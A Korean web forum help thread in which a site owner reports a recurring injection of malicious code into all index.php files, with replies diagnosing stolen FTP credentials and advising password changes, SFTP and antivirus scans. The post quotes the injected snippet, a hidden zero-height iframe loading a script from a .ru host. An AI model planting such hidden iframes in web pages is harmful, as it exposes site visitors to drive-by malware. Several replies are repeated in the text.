급히 도움글을 구합니다..계정에 악성코드가 계속 생성되는군요 정보
급히 도움글을 구합니다..계정에 악성코드가 계속 생성되는군요본문
<div style="display:none"></div>
<iframe src="http://soul-of-man.ru:8080:8080/ts/in.cgi?sony" width=252 height=0 style="visibility: hidden"></iframe>
앞서 글을 올렸는데, 지금 난감한 상황이 계속되고 있네요.
index.php 파일들에서 상기의 코드를 삭제해도
홈페이지가 접속이 안되서 확인을 해보면 얼마 지나지 않아서 또 위와 같은 코드가 생성이 됩니다.
이거 어떻게 대처해야 할지를 모르겠네요.
왜이렇게 자동으로 자꾸 코드가 생성되는것인지, 응급 대처방법을 좀 알려주십시요.
컴퓨터쪽문제인지, 서버쪽 문제인지...
계속 생성되는 이 악성코드를 차단할 방법이 지금 필요합니다.
그룹별 index.php 파일이 여러개인데 모조리 감염이 되고 있네요
심지어 /gnu/adm/index.php 파일까지 모두 감염...
index.php 파일은 모두 감염시키고 있네요~~~
추천
0
0
댓글 9개
저도 같은 경험이 있습니다.
우선 FTP 접속 컴퓨터에 바이러스 감염여부를 확인하세요
FTP계정이 바이러스로 인해 노출되어.. 해당계정의 서버안의 파일들에 임의로 해당 악성코드가 삽입이 됩니다. 인덱스파일 뿐아니라 임의대로 아무파일에나 심어져 있기때문에
일단 FTP패스워드 바꾼후 바로 접속하지 마시고.. FTP접속했던 컴퓨터 포맷하세요
그리고 일반 FTP로 접속하지 마시고 SFTP로 접속하시면 됩니다.
접속후 모든 파일 다운받아서 해당 바이러스소스 가 어디어디에 숨어있는지 파일검색으로 찾아내서 모두 삭제하세요
저도 이렇게 한후 이상이 없었습니다.
우선 FTP 접속 컴퓨터에 바이러스 감염여부를 확인하세요
FTP계정이 바이러스로 인해 노출되어.. 해당계정의 서버안의 파일들에 임의로 해당 악성코드가 삽입이 됩니다. 인덱스파일 뿐아니라 임의대로 아무파일에나 심어져 있기때문에
일단 FTP패스워드 바꾼후 바로 접속하지 마시고.. FTP접속했던 컴퓨터 포맷하세요
그리고 일반 FTP로 접속하지 마시고 SFTP로 접속하시면 됩니다.
접속후 모든 파일 다운받아서 해당 바이러스소스 가 어디어디에 숨어있는지 파일검색으로 찾아내서 모두 삭제하세요
저도 이렇게 한후 이상이 없었습니다.
포맷이라...난감하군요
포맷까지는 필요 없고..V3, PC그린, 알약 3개 다 깔고 각 은행들 다 들어가서 악성 코드 잡는거 다 설치합니다. 저는 한 4~5개 정도 은행 들어가서 다 설치 했습니다.
그 이후 컴퓨터 모든 하드 다 바이러스 검사 합니다.
그러면 악성코드 몇개 잡힙니다. 다 치료및삭제하고 재부팅 해서 다시 한번더 그렇게 합니다.
그렇게 했을때 안잡히면 ftp들어가서 파일다 받아서 그 악성코드 소스를 다 지우고 다시 업하면 됩니다.
이렇게 해서 겨우 한건 해결했습니다.
될수있으면 V3랑 알약, PC그린 3개중에 2개 정도를 같이 사용하는게 정신 건강에 좋습니다.
그 이후 컴퓨터 모든 하드 다 바이러스 검사 합니다.
그러면 악성코드 몇개 잡힙니다. 다 치료및삭제하고 재부팅 해서 다시 한번더 그렇게 합니다.
그렇게 했을때 안잡히면 ftp들어가서 파일다 받아서 그 악성코드 소스를 다 지우고 다시 업하면 됩니다.
이렇게 해서 겨우 한건 해결했습니다.
될수있으면 V3랑 알약, PC그린 3개중에 2개 정도를 같이 사용하는게 정신 건강에 좋습니다.
리플감사합니다. 일단 한번 해봐야 겠군요~ ^^;
저도 같은 증상에 포맷하고 나니 더이상 안 걸리네요. --;
pdf 리더 프로그램으로 들어온다고 하던데요....
pdf 리더 프로그램으로 들어온다고 하던데요....
일단 FTP접속 비밀번호를 변경하시고
혼자만 접속해서 쓰시는 계정이라면 쓰시는 컴퓨터에 v3등으로 정밀검사 한번 하시면 문제 없을겁니다
만약 타인이 다른 곳에서 접속을 해야하는 상황이면 해당 컴퓨터도 검사를 해야합니다
혼자만 접속해서 쓰시는 계정이라면 쓰시는 컴퓨터에 v3등으로 정밀검사 한번 하시면 문제 없을겁니다
만약 타인이 다른 곳에서 접속을 해야하는 상황이면 해당 컴퓨터도 검사를 해야합니다
V3, 알약, PC그린은 당연히 기본이지만
귀찮으시더라도 하나의 의견을 더 말씀드리자면,
사이트 다니시면 정품 중에서 30일, 60일 뭐 이런 쉐어버전들이 많으니
괜찮은 거 돌리시고 지우시고, 이런 식으로 여러개 돌리다 보면
노다가라서 귀찮긴 해도 숨겨진 거 잡을 수 있을 것입니다.
귀찮으시더라도 하나의 의견을 더 말씀드리자면,
사이트 다니시면 정품 중에서 30일, 60일 뭐 이런 쉐어버전들이 많으니
괜찮은 거 돌리시고 지우시고, 이런 식으로 여러개 돌리다 보면
노다가라서 귀찮긴 해도 숨겨진 거 잡을 수 있을 것입니다.
forever님 본인 컴퓨터에서 바이러스가 감염이 되서 변조가 되는건데 .
당연히 인덱스에 해당 소스만 바꾼다고 될일이 아니죠 ..
forever님 컴퓨터 바이러스부터 치료 하시고 나서 올리셔야 합니다.
당연히 컴퓨터는 바이러스에 걸려서 변조 하는데 인덱스만 해당 소스 바꿔서 올린다고 .. 없어지는게
아닙니다.
근데 저런짓을 도대체 왜 하는지 이해를 못하겠다는
당연히 인덱스에 해당 소스만 바꾼다고 될일이 아니죠 ..
forever님 컴퓨터 바이러스부터 치료 하시고 나서 올리셔야 합니다.
당연히 컴퓨터는 바이러스에 걸려서 변조 하는데 인덱스만 해당 소스 바꿔서 올린다고 .. 없어지는게
아닙니다.
근데 저런짓을 도대체 왜 하는지 이해를 못하겠다는
리플주신내용들대로 해서 겨우 다 잡은듯? 합니다.
알약,v3,카스퍼스키...다돌려서 악성코드며스파이웨어 모조리 잡아내고
ftp비번변경하고...생~~쑈를 했네요.
Thank U all
알약,v3,카스퍼스키...다돌려서 악성코드며스파이웨어 모조리 잡아내고
ftp비번변경하고...생~~쑈를 했네요.
Thank U all